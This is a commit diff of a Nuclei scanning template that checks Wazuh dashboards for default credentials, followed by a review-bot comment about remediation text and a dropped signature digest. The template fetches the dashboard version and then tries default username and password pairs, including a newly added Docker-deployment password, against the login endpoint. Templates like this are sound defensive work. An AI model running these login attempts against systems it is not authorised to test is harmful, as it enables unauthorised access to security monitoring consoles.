commit
1ae53f6235
|
@ -2,33 +2,45 @@ id: wazuh-default-login
|
||||||
|
|
||||||
info:
|
info:
|
||||||
name: Wazuh - Default Login
|
name: Wazuh - Default Login
|
||||||
author: theamanrawat
|
author: theamanrawat,denandz,PulseSecurity.co.nz
|
||||||
severity: high
|
severity: high
|
||||||
description: |
|
description: |
|
||||||
Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
Wazuh contains default credentials. An attacker can obtain access to user accounts and access sensitive information, modify data, and/or execute unauthorized operations.
|
||||||
reference:
|
reference:
|
||||||
- https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
|
- https://documentation.wazuh.com/current/user-manual/user-administration/password-management.html
|
||||||
- https://wazuh.com
|
- https://wazuh.com
|
||||||
|
- https://documentation.wazuh.com/current/deployment-options/docker/wazuh-container.html#single-node-deployment
|
||||||
metadata:
|
metadata:
|
||||||
verified: true
|
verified: true
|
||||||
max-request: 4
|
max-request: 6
|
||||||
shodan-query: title:"Wazuh"
|
shodan-query: title:"Wazuh"
|
||||||
tags: wazuh,default-login
|
tags: wazuh,default-login
|
||||||
|
|
||||||
http:
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/app/login"
|
||||||
|
|
||||||
|
extractors:
|
||||||
|
- type: regex
|
||||||
|
part: body
|
||||||
|
name: osd
|
||||||
|
group: 1
|
||||||
|
internal: true
|
||||||
|
regex:
|
||||||
|
- '"version":"([0-9.]+)"'
|
||||||
|
|
||||||
- raw:
|
- raw:
|
||||||
- |
|
|
||||||
GET /app/login?nextUrl=%2Fapp%2Fwazuh HTTP/1.1
|
|
||||||
Host: {{Hostname}}
|
|
||||||
- |
|
- |
|
||||||
POST /auth/login HTTP/1.1
|
POST /auth/login HTTP/1.1
|
||||||
Host: {{Hostname}}
|
Host: {{Hostname}}
|
||||||
Osd-Version: {{osd}}
|
Osd-Version: {{osd}}
|
||||||
|
osd-xsrf: osd-fetch
|
||||||
Content-Type: application/json
|
Content-Type: application/json
|
||||||
|
|
||||||
{"username":"{{username}}","password":"{{password}}"}
|
{"username":"{{username}}","password":"{{password}}"}
|
||||||
|
|
||||||
attack: pitchfork
|
attack: clusterbomb
|
||||||
payloads:
|
payloads:
|
||||||
username:
|
username:
|
||||||
- "admin"
|
- "admin"
|
||||||
|
@ -36,6 +48,7 @@ http:
|
||||||
password:
|
password:
|
||||||
- "admin"
|
- "admin"
|
||||||
- "wazuh"
|
- "wazuh"
|
||||||
|
- "SecretPassword"
|
||||||
stop-at-first-match: true
|
stop-at-first-match: true
|
||||||
|
|
||||||
matchers-condition: and
|
matchers-condition: and
|
||||||
|
@ -56,13 +69,3 @@ http:
|
||||||
- type: status
|
- type: status
|
||||||
status:
|
status:
|
||||||
- 200
|
- 200
|
||||||
|
|
||||||
extractors:
|
|
||||||
- type: regex
|
|
||||||
name: osd
|
|
||||||
group: 1
|
|
||||||
regex:
|
|
||||||
- '"version":"([0-9.]+)"'
|
|
||||||
internal: true
|
|
||||||
|
|
||||||
# digest: 4b0a00483046022100de2c876067d0aa43fb62771bff3c3adea76873a9f0982f98856a1ed321b58d48022100a60ef9271fd209ecadc68b365c82e4176cd78fe24526dcbe7a8cd8772b0337cf:922c64590222798bb761d5b6d8e72950
|
|
||||||
|
|
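Review bot: The `info` block does not say where the newly added `SecretPassword` payload comes from or what to do about a hit; the only hint is the added Docker single-node reference, so the link between the two is inferred. A sentence in `description` such as `Covers the existing admin and wazuh passwords and the password shipped with the Docker single-node deployment.` would tell whoever triages a finding which deployment to check. An `info.remediation` entry pointing at the password-management page already listed under `reference` would make the result actionable, for example `remediation: Change the default passwords as described in the Wazuh password management documentation.` Separately, the last hunk drops the `# digest:` line, so the template presumably needs re-signing before it is distributed.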